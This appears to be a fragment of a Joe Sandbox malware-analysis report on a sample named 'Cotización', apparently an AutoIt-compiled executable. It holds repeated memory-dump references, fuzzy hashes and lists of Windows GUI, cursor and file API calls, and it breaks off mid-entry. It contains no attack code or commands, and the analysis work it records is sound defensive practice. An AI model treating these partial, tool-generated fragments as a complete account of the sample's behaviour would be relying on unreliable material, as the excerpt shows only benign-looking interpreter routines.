                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: NameUser
                • String ID:
                • API String ID: 2645101109-0
                • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID: N@
                • API String ID: 0-1509896676
                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                Memory Dump Source
                • Source File: 00000000.00000002.1329743365.0000000004069000.00000040.00000020.00020000.00000000.sdmp, Offset: 04069000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4069000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                • Instruction ID: 55ce334977cbc5bd33f528d0329b762740e21c80802a63ec6c37822c5aea0d65
                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                • Instruction Fuzzy Hash: 5841D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                Memory Dump Source
                • Source File: 00000000.00000002.1329743365.0000000004069000.00000040.00000020.00020000.00000000.sdmp, Offset: 04069000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4069000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                • Instruction ID: 3d9d842b180ba7f76f3f9466977bb3f6b5ed7f1779eb9c6e94c4aceafc2ffeed
                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                • Instruction Fuzzy Hash: 38017E78A04109EF8B84DF98C5909AEF7F5FF88310B208599D81AAB305E770AE41DB80
                Memory Dump Source
                • Source File: 00000000.00000002.1329743365.0000000004069000.00000040.00000020.00020000.00000000.sdmp, Offset: 04069000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4069000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                • Instruction ID: ef9d64bc9137c2df4ea5bdaf7d9b0e874c83ba7b88cf661935321d56c271441a
                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                • Instruction Fuzzy Hash: 6701A478A04109EFDB84DF98D5909AEF7F5FF48310F208599D91AA7305E731AE42DB80
                Memory Dump Source
                • Source File: 00000000.00000002.1329743365.0000000004069000.00000040.00000020.00020000.00000000.sdmp, Offset: 04069000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4069000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                APIs
                • DeleteObject.GDI32(?), ref: 0045953B
                • DeleteObject.GDI32(?), ref: 00459551
                • DestroyWindow.USER32(?), ref: 00459563
                • GetDesktopWindow.USER32 ref: 00459581
                • GetWindowRect.USER32(00000000), ref: 00459588
                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                • GetClientRect.USER32(00000000,?), ref: 004596F8
                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                • ShowWindow.USER32(?,00000004), ref: 00459865
                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                • GetStockObject.GDI32(00000011), ref: 004598CD
                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                • DeleteDC.GDI32(00000000), ref: 004598F8
                • _wcslen.LIBCMT ref: 00459916
                • _wcscpy.LIBCMT ref: 0045993A
                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                • GetDC.USER32(00000000), ref: 004599FC
                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                • String ID: $AutoIt v3$DISPLAY$static
                • API String ID: 4040870279-2373415609
                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                APIs
                • GetSysColor.USER32(00000012), ref: 0044181E
                • SetTextColor.GDI32(?,?), ref: 00441826
                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                • GetSysColor.USER32(0000000F), ref: 00441849
                • SetBkColor.GDI32(?,?), ref: 00441864
                • SelectObject.GDI32(?,?), ref: 00441874
                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                • GetSysColor.USER32(00000010), ref: 004418B2
                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                • DeleteObject.GDI32(?), ref: 004418D5
                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                • FillRect.USER32(?,?,?), ref: 00441970
                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                • String ID:
                • API String ID: 69173610-0
                • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                APIs
                • DestroyWindow.USER32(?), ref: 004590F2
                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                • GetClientRect.USER32(00000000,?), ref: 0045924E
                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                • GetStockObject.GDI32(00000011), ref: 004592AC
                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                • DeleteDC.GDI32(00000000), ref: 004592D6
                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                • GetStockObject.GDI32(00000011), ref: 004593D3
                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                • API String ID: 2910397461-517079104
                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __wcsnicmp
                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                • API String ID: 1038674560-3360698832
                • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                APIs
                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                • SetCursor.USER32(00000000), ref: 0043075B
                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                • SetCursor.USER32(00000000), ref: 00430773
                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                • SetCursor.USER32(00000000), ref: 0043078B
                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                • SetCursor.USER32(00000000), ref: 004307A3
                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                • SetCursor.USER32(00000000), ref: 004307BB
                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                • SetCursor.USER32(00000000), ref: 004307D3
                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                • SetCursor.USER32(00000000), ref: 004307EB
                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                • SetCursor.USER32(00000000), ref: 00430803
                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                • SetCursor.USER32(00000000), ref: 0043081B
                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                • SetCursor.USER32(00000000), ref: 00430833
                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                • SetCursor.USER32(00000000), ref: 0043084B
                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                • SetCursor.USER32(00000000), ref: 00430863
                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                • SetCursor.USER32(00000000), ref: 0043087B
                • SetCursor.USER32(00000000), ref: 00430887
                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                • SetCursor.USER32(00000000), ref: 0043089F
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
